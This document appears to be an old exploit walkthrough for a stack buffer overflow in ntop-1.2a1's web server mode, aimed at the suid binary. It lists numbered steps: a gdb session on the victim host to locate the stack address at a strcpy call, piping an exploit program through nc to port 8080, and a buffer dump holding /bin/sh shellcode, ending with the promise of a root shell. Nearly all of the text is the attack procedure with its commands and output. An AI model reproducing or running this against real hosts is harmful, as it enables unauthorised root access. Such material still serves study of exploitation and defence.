1. [on victim host] First modify ntop-1.2a1 src code to execute it with non-root priviledge. and compile it. ntop.c:362 if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){ 2. [on local host] do "tcpdump -w somefile" to get tcpdump file to feed ntop. copy it to victim host. 3. [on victim host] execute following with our modified ntop $ ./ntop -w 8080 -f somefile Warning: unable to read file '.ntop'. No security will be used! Waiting for HTTP connections on port 8080... 4. [on victim host] run gdb to attach our ntop process. and break at function returnHTTPPage. $ gdb ./ntop 2634 (gdb) break returnHTTPPage Breakpoint 1 at 0x8051350 (gdb) cont Continuing. [Switching to Thread 28851] 5. [on local host] execute exploit to victim host $ ./ntop-w-exp | nc victim 8080 6. [on victim host] gdb will stop at breakpoint returnHTTPPage. then you set break point on function strcpy, and then continue, then gdb will stop at strcpy breakpoint. The value of "dest=0xbefffb00" is the location of stack we will use as esp value. Breakpoint 1, 0x8051350 in returnHTTPPage () (gdb) break strcpy Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33. (gdb) cont Continuing. Breakpoint 2, strcpy (dest=0xbefffb00 "$ý¡¾±\017\005\b\b", src=0x8091dc1 '\220' , "êÌ037^\211v\b1¿º210F\a\211F\fs.013\211òÌ215N\b\215V\fÌÌ2001ÚÌ211ÙÐÌÌ200èÜmes>bin/sh\030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030"...) at ../sysdeps/generic/strcpy.c:33 (gdb) cont Continuing. 7. [on victim host] Now kill our ntop and run suid ntop. $ /usr/local/sbin/ntop -w 8080 8. [on local host] modify esp value in ntop-w-exp.c and execute exploit. you can set offset with first argument to ntop-w-exp. I think offset must be minus value. $ ./ntop-w-exp | nc victim 8080 9. [on victim host] You will get root shell.